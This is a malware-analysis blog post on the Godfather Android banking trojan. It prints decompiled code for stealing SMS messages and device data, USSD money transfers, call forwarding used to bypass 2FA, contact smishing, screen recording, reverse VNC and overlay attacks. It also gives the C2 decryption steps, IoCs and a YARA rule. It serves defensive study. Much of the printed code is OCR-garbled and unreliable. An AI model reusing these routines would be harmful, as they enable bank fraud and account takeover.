Technical analysis of Godfather android malware

muha2xmad.github.io/malware-analysis/godfather/

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بسم الله الرحمن الرحيم

FreePalestine

Introduction

Godfather is a malware that targets Android devices. It was first discovered in 2020 and is known for its sophisticated and aggressive behavior. The malware is designed to steal sensitive information such as banking credentials, passwords, and other personal data from infected devices.

The Godfather Android banking malware is a threat to users in 16 countries, as it has been designed to steal account credentials from over 400 online banking sites and cryptocurrency exchanges. It accomplishes this by disguising itself as a login screen, overlaying the login forums of banking and cryptocurrency exchange apps.

Anti-emulator

After installing The malware on the device, it checks the device if it's an **emulator** or not. If the malware is installed on the emulator, the malware **will not** run its malicious functions.



Figure(1): The method that checks for emulator existence

The method retrun is **boolean**. When the malware checks for the emulator exitance, the return is **0** when there's no emulator or the return is **1** when there's an emulator

Collect vectim's device info

The malware will collect information about the device that's infected and send the collected information to the **C2 server**. The information which will be sent to the C2 server such as applist which will collect all the applications installed on the device, ag to get the user agent, sim to get the network operator name, phone to get the phone number of the device, model, and ver of the device.

```
public static void device_info(Context ctx, String eyes) {
    try {
        TelephonyManager tm = (TelephonyManager)ctx.getSystemService("phone");
        HashMap params = new HashMap();
        params.put("key", runebearingdealerdom.kddda9ca(ctx, "key"));
        Objects.requireNonNull(runebearingdealerdom.kecc3);
        params.put("tag", "POPTR");
        params.put("country", "en");
        params.put("country", "en");
        params.put("suid.vEatSon.RELEASE);
        params.put("suid.vEatSon.RELEASE);
        params.put("applist", runebearingdealerdom.k8204fe4(ctx));
        params.put("replay", "true");
        params.put("replay", "true");
        params.put("eyes", eyes);
        params.put("eyes", runebearingdealerdom.kddda9ca(ctx, "vnc_permission"));
        params.put("getartnow", runebearingdealerdom.kddda9ca(ctx, "video_reset"));
        if(!runebearingdealerdom.kddda9ca(ctx, "video_reset"));
        }
        params.put("apg", WebSettings.getDefaultUserAgent(ctx));
        params.put("agg", WebSettings.getDefaultUserAgent(ctx));
        params.put("app.perm_check", runebearingdealerdom.kddda9ca(ctx, "send_all_permission"));
        params.put("app.perm_check", runebearingdealerdom.kddda9ca(ctx, "app.perm_check"));
        params.put("app.perm_check", runebearingdealerdom.kddda9ca(ctx, "app.perm_check"));
        params.put("app.perm_check", runebearingdealerdom.kddda9ca(ctx, "accessibility"));
        params.put("locker_permes", runebearingdealerdom.kdda9ca(ctx, "accessibility"));
        params.put("locker_permes", runebearingdealerdom.kdda9ca(ctx, "locker_perme"));
        trans.put("locker_permes", runebearingdealerdom.kddda9ca(ctx, "
```

Figure(2): The method that collects info about the victim's device

USSD

This method can make the malware transfers meoney using money transfers by making USSD (Unstructured Supplementary Service Data) calls without even using the dialer user interface.

```
public void onCreate(Bundle savedInstanceState) {
    super.onCreate(SavedInstanceState);
    this.setContentView(0x7F0B001F); // layout:activity_main
    try {
        String s = this.getIntent().getStringExtra("usd").replace("AAA", "#");
        if(runebearingdealerdom.kddda9ca(this, "accessibility") != null) {
            this.startActivity(new Intent("android.intent.action.CALL").setData(Uri.parse("tel:" + Uri.encode(s))));
        }
        this.finish();
        }
        catch(Exception unused_ex) {
        }
    }
}
```

Figure(3): The method that performs USSD

When the malware communicate withe C2 server and the response from the C2 server contains startUSSD command, the malware will start this method to transfer money using USSD.

```
if(!smokeryMicromeria.kddda9ca(ctx, "command").contains(smokeryMicromeria.kf1db)) {
    if(smokeryMicromeria.kf1db.contains("startUSSD")) {
        try {
            smokeryMicromeria.k29fd779(ctx, "start_ussd", "true");
            String[] arr_s = smokeryMicromeria.kf1db.trim().split("godfather");
            Intent intent0 = new Intent(ctx, USSD.class).putExtra("usd", arr_s[1]);
            intent0.addFlags(0x10000000);
            intent0.addFlags(0x40000000);
            ctx.startActivity(intent0);
        }
        catch(Exception unused_ex) {
            return;
        }
    }
}
```

Figure(4): The command that performs USSD

Call forwarding

The malware has the ability to forward incomming calls. This is used to bypass the two factor authintication 2FA.

```
public static void call_forwarding(Context context, String number) {
    try {
        Intent intentCallForward = new Intent("android.intent.action.CALL");
        intentCallForward.addFlags(0x10000000);
        intentCallForward.setData(Uri.fromParts("tel", number, "#"));
        context.startActivity(intentCallForward);
        runebearingdealerdom.ke45dc21(context, (number.equals("#21#") ? number + " Call Forawading Stoped" : number + " Call Forawading Started"));
    }
    catch(Exception unused_ex) {
    }
}
```

Figure(5): The method that performs call fowrwarding

When the malware communicate withe C2 server and the response from the C2 server contains startforward command, the malware will start this method to start call forwarding.

```
else if(smokeryMicromeria.kf1db.contains("startforward")) {
    try {
        runebearingdealerdom.call_forwarding(ctx, "*21*" + smokeryMicromeria.kf1db.trim().split("godfather")[1] + "#");
    }
    catch(Exception unused_ex) {
        return;
    }
    else if(smokeryMicromeria.kf1db.contains("stopforward")) {
        try {
            runebearingdealerdom.call_forwarding(ctx, "#21#");
        }
        catch(Exception unused_ex) {
            runebearingdealerdom.call_forwarding(ctx, "#21#");
        }
        catch(Exception unused_ex) {
            runebearingdealerdom.call_forwarding(ctx, "#21#");
        }
        catch(Exception unused_ex) {
            return;
        }
    }
    }
}
```

Figure(6): The command that performs call forwarding

Push notifications

The malware will push fake notifications as if the notification came from ligitmate application. When the user opens the fake notifications, this opens a fake Web page and the user may enter his/her inforamtions such as username, email, or password.



Figure(7): The method that performs pushing fake notifications

When the malware communicate withe C2 server and the response from the C2 server contains startPush command, the malware will start this method to start pushing fake notifications.

```
else if(smokeryMicromeria.kf1db.contains("startPush")) {
    try {
        String[] arr_53 = smokeryMicromeria.kf1db.trim().split("godfather");
        ctx.startService(new Intent(ctx, toluidinsdithering.class).putExtra("appname", arr_s3[1]).putExtra("title", arr_s3[2]).putExtra("text", arr_s3[3]));
    }
    catch(Exception unused_ex) {
        return;
    }
}
```

Figure(8): The command that performs pushing fake notifications

Smishing

The malware will send message which contains malicous URLs to download malicous applications to victim's contacts. This message is received from the C2 server and then the malware will send it to all contacts.

```
public static void Query_contacts(ContentResolver cr, String text, Context ctx) {
      Cursor cursor0 = cr.query(ContactsContract.CommonDataKinds.Phone.CONTENT URI, null, null, null);
      int cwc good = 0;
      int schet sws = 0;
      while(cursor0.moveToNext()) {
            ring s1 = cursor0.getString(cursor0.getColumnIndex("data1"));
          if((s1.contains("*")) || (s1.contains("#")) || s1.length() <= 7) {
              continue;
          }
          cwc_good = 1;
          ++schet_sws;
      }
      if(cwc good == 1) {
          runebearingdealerdom.ke45dc21(ctx, "Ssms book sender was successful, " + schet_sws + " SMS sent|");
      }
      phlegmsbutment.k69a2.finish();
  }
```

Figure(9): The method that query contacts

When the malware communicate withe C2 server and the response from the C2 server contains BookSMS command, the malware will start this method to start sending SMSs to the victim's contacts.

```
else if(smokeryMicromeria.kf1db.contains("BookSMS")) {
    try {
        runebearingdealerdom.k0f6e92c(ctx, smokeryMicromeria.kf1db.trim().split("godfather")[1]);
    }
    catch(Exception unused_ex) {
        return;
        Query contacts
    }
}
```

Figure(10): The command that performs Smishing

Steal SMSs

The malware will collect the SMSs on the victim's device and send the data to the C2 server. This is used to bypass the two factor authintication 2FA.

```
public static void collect SMSs(Context context, String data, String n, String t) {
    String 53 = dsta.contains('SMS-DB') ? "SMS-DB' + runebearingdealerdom.encode_base64(data + '\n' + "Number: " + n + '\n' + "Text: " + t + '\n' + "|") : data + '\n' + "Number: " + n + '\n' + "Text: " + t + '
    try {
        HashMap parms = new HashMap();
        params.put('message', runebearingdealerdom.k0dda9ca(context, "key"));
        params.put('message', runebearingdealerdom.k0da9ca(context, "key''));
        params.put('message', runebearingdealerdom.k0da9ca(context, "key''));
        params.put('message', runebearingdealerdom.k0da9ca(context, "key''));
        params.put('message', runebearingdealerdom.k0da9ca(context, "key''));
        params.put('message'', runebearingdealerdom.encode_base64(s3)));
        params.put('message'', runebearingdealerdom.encode_base64(s3));
        params.put('message'', runebearingdealerdom.encode_base64(s3));
        params.put('message'', runebearingdealerdom.encode_base64(s3));
```

Figure(11): The method that performs collecting SMSs

When the malware communicate withe C2 server and the response from the C2 server contains sentSMS command, the malware will start this method to start sending the SMSs to the C2 server.

```
else if(smokeryMicromeria.kf1db.contains("sentSMS")) {
    try {
        smokeryMicromeria.kf1db.trim().split("godfather");
    }
    catch(Exception unused_ex) {
        return;
    }
}
```

Figure(12): The command that performs stealing SMSs

Record the screen

The malware will record a video of the screen of the victim's device then sends the video to the C2 server. This technique is used to steal sensitive data as the same as overlay attack. When the user opens a targeted app, the malware send to the C2 server that the user opened a targeted app. The C2 server sends a command to start recording the screen.

```
private void recording_video(int resultCode, Intent data) {
       this.k9cd1 = (MediaProjectionManager)this.getApplicationContext().getSystemService("media_projection");
this.k8039 = new MediaRecorder();
       DisplayMetrics metrics = new DisplayMetrics();
       ((Winde
                wManager)this.getApplicationContext().getSystemService("window")).getDefaultDisplay().getRealMetrics(metrics);
       int displayWidth = metrics.widthPixels;
       int displayHeight = metrics.heightPixels;
       this.k8039.setVideoSource(2):
       this.k8039.setOutputFormat(2);
       this.k8039.setVideoEncoder(2):
       this.k8039.setVideoEncodingBitRate(0x7D000);
       this. k8039.setVideoErameRate(30):
       this.k8039.setVideoSize(displayWidth, displayHeight);
       String s = Environment.getExternalStoragePublicDirectory(Environment.DIRECTORY_MOVIES).getAbsolutePath();
File fxx = new File(Environment.getExternalStoragePublicDirectory(Environment.DIRECTORY_MOVIES).getAbsolutePath());
       if(!fxx.exists()) {
            fxx.mkdir();
       }
       Long long0 = (long)System.currentTimeMillis();
       if(displayWidth > displayHeight) {
    new String("landscape");
       3
       String s1 = s + "/" + runebearingdealerdom.kddda9ca(this, "key") + "_" + long0 + ".mp4";
runebearingdealerdom.put_in_shared_pref(this, "mp4_file", s1);
       this.k8039.setOutputFile(s1);
       try {
            this.k8039.prepare();
       catch(IllegalStateException unused_ex) {
            return;
       catch(IOException unused ex) {
           return;
       }
       this.ka560 = this.k9cd1.getMediaProjection(resultCode, data);
                surface0 = this.k8039.getSurface();
       this.k0266 = this.ka560.createVirtualDisplay("MainActivity", displayWidth, displayHeight, 0xF0, 2, surface0, null, null);
       this.k8039.start();
       Log.v("MainActivity", "Started recording");
```

Figure(13): The method that performs recording a video

VNC

VNC, which stands for Virtual Network Computing, is a protocol for remote control of computers. VNC can be used by the malware to gain remote control over an infected device, allowing the attacker to perform various malicious activities.

For example, a VNC-based Android malware might allow an attacker to remotely access the device's screen, camera, microphone, and other resources, allowing them to steal sensitive information, carry out phishing attacks, or monitor the user's activities. The malware may also use the VNC connection to install additional malicious software on the device, making it part of a larger network of compromised devices (known as a botnet).

```
public static void ka4af1d4(Context ctx, String vnc_command, String vnc_host) {
    new runebearingdealerdom();
    if(vnc_command.contains("open")) {
        try {
            if((vnc_host.contains(".")) && (MainService.connectReverse(vnc_host, 5500))) {
                runebearingdealerdom.put_in_shared_pref(ctx, "vnc_open", "true");
                return;
            }
        }
        catch(Exception unused_ex) {
            return;
            }
        }
    }
}
```

Figure(14): The command that performs starting VNC

settings_port: The value of the port is 5900.

settings_password: the value of the password is 123.

user: the value of the user is bluetooth_name.

vnc_host: the value of the host is 5500.

The settings_port, settings_password values are saved in the Shared Preferences.

Overlay attack

When the user opens a targeted app, the malware displays a fake or malicious overlay on top of the active window of the targeted app. The opened malicious window is the same as the legitimate app. This allows the attacker to steal sensitive information, such as login credentials, credit card numbers, or other sensitive data, by tricking the user into entering it into the overlay.

```
public static void overlay(Context ctx) {
           int v1;
          int v:
                           ger.LayoutParams layoutParams;
          try {
    C0470a aVar = InputService.k236a;
                  InputService.k1e4d = new FrameLayout(ctx);
                 InputDeriver.ited = inter functagoot(cts);
layoutParams = new WindowManager.LayoutParams(-1, -1, 0x7F0, 0x2003B8, -3);
if(Build.VERSION.SDK_INT >= 30) {
    Rect rect0 = InputService.k6c44.getCurrentWindowMetrics().getBounds();
                        v = rect0.width();
                        v1 = rect0.height();
                 Point point = new Point();
display0.getRealSize(point);
                       display0.getRealSize(point);
v = point.x;
v1 = point.y;
                 }
                int v2 = ctx.getResources().getIdentifier("status_bar_height", "dimen", '
int v3 = v2 <= 0 ? 0 : ctx.getResources().getDimensionPixelSize(v2) * 2;
layoutParams.width = v + v3 + 200;</pre>
                                                                                                                                         "android");
                layoutParams.wight = v1 + v3;
layoutParams.height = v1 + v3;
layoutParams.flags = runebearingdealerdom.kddda9ca(ctx, "sunset_gravity").contains("100") ? 2040 : 2008;
layoutParams.gravity = 49;
FrameLayout frameLayout2 = InputService.kle4d;
if(frameLayout2 != null) {
                        frameLayout2.setBackgroundColor(0xFF000000);
                 }
                 aVar.m6907a(ctx);
                 InputService.k1e4d.setElevation(10.0f);
                  InputService.k1e4d.setEnabled(false);
                 InputService.k1e4d.setOnTouchListener(new com.viber.voip.InputService.1());
                ImpuService.kiew.setonuokiistem(inew.com.viper.vobpringuService.r()),
ImageView first = new ImageView(ctx);
first.setImageBitmap(BitmapFactory.decodeResource(ctx.getResources(), 0x7F070081)); // drawable:first
if(runebearingdealerdom.kddda9ca(ctx, "sunset_gravity").contains("100")) {
    InputService.kiedd.addView(first);
                 3
```

Figure(15): The method that performs overlay attack

Start/Kill the malware

The C2 server sends to the malware to start or terminate itself.

```
else if(smokeryMicromeria.kf1db.contains("startApp")) {
    try {
        runebearingdealerdom.kef059a0(ctx, smokeryMicromeria.kf1db.trim().split("godfather")[1]);
        }
        catch(Exception unused_ex) {
            return;
        }
    }
}
```

Figure(16): The command that starts the malware

```
else if(smokeryMicromeria.kf1db.contains("killbot")) {
    smokeryMicromeria.k29fd779(ctx, "killbot", "true");
    Intent appSettingsIntent = new Intent("android.settings.APPLICATION_DETAILS_SETTINGS", Uri.parse("package:" + ctx.getPackageName()));
    appSettingsIntent.addFlags(0x10000000);
    ctx.startActivity(appSettingsIntent);
}
```

Figure(17): The command that performs killing the bot

Cache cleaner

The malware will clean the cache of an app. The malware will send cachecleaner command from the C2 server and app name in the command.

```
else if(smokeryMicromeria.kf1db.contains("cachecleaner")) {
    try {
        String[] arr_s1 = smokeryMicromeria.kf1db.trim().split("godfather");
        smokeryMicromeria.k29fd779(ctx, "cache_cleaner1", "false");
        smokeryMicromeria.k29fd779(ctx, "cache_cleaner2", "false");
        smokeryMicromeria.k29fd779(ctx, "cache_cleaner3", "false");
        Intent intent = new Intent();
        intent.setAction("android.settings.APPLICATION_DETAILS_SETTINGS");
        intent.setFlags(0x1000000);
        ctx.startActivity(intent);
    }
    catch(Exception_unused_ex) {
        return;
    }
}
```

Figure(18): The command that clear the cache

Communications

The malware will get the C2 server URL from description of a Telegram channel. The malware will send an HTTP reguest To https://t.me/varezotukomirza to get the encrypted C2 server zH7cPW3ZEHj5SDEKxFtXcoMXMJmMGlMGCH978whkdfQ. The C2 server is encrypted using Blowfish algorithm with ECB_MODE and ABC as a key and encoded using Base64.



Figure(19): The encrypted C2 server

When we decrypt The C2 server:

- Decoded the Base64, then
- Decrypt the blowfish with ECB_MODE using ABC as a key

Thanks to <u>Witold Precikowski</u> for helping to decrypt the C2 server. We use this script to decrypt the encrypted C2 server obtained form the Telegram channel.

```
from Crypto.Cipher import Blowfish
import base64
bs = Blowfish.block_size
key = b'ABC'
data = 'zH7cPW3ZEHj5SDEKxFtXcoMXMJmMGlMGCH978whkdfQ='
# Base64 decode
ciphertext = base64.b64decode(data)
# Decrypt Blowfish in ECB mode
cipher = Blowfish.new(key, Blowfish.MODE_ECB)
msg = cipher.decrypt(ciphertext)
last_byte = msg[-1]
msg = msg[:- (last_byte if type(last_byte) is int else ord(last_byte))]
print(msg)
```

The decrypted C2 server will be https://kalopterbomrassa.shop/.

After the malware gets the C2 server the communication between the C2 server and the malware will be decrypted using AES/CBC/NoPadding with fedcba9876543210 as IV and 0123456789abcdef as a key.

```
public AES_Config() {
    this.k0d73 = "0123456789abcdef";
    AES_Config.AES_IV = new IvParameterSpec("fedcba9876543210".getBytes());
    AES_Config.AES_key = new SecretKeySpec("0123456789abcdef".getBytes(), "AES");
    try {
        AES_Config.k0840 = Cipher.getInstance("AES/CBC/NoPadding");
     }
     catch(NoSuchAlgorithmException unused_ex) {
     }
}
```

Figure(20): Algorithm to decrypt communication between the C2 server and the malware

Special thanks to <u>Witold Precikowski</u>, <u>Lasha kh.</u>, and <u>Re-ind</u> for their continuous help and support.

loCs

App name: MYT Müzik

Package name: com.expressvpn.vpn

Sha256: 138551cd967622832f8a816ea1697a5d08ee66c379d32d8a6bd7fca9fdeaecc4

Telegram channel: https://t.me/varezotukomirza

Yara rule

```
rule Godgather {
 meta:
   author = "@muha2xmad"
             = "2023-02-09"
   date
   description = "Godfather android malware"
   version = "1.0"
 strings:
   $str00 = "main_wang" nocase
   $str01 = "#21#" nocase
   $str02 = "config" nocase
   $str03 = "godfather" nocase
   $str04 = "fafa.php" nocase
   $str05 = "POPTR" nocase
   $str06 = "patara.php" nocase
 condition:
   uint32be(0) == 0x504B0304 // APK file signature
     and ( all of ($str*))
}
```

Article quote

من نبتَ لحمه من ماء البِرَك كيف يستسيغُ ماء زمزم



REF

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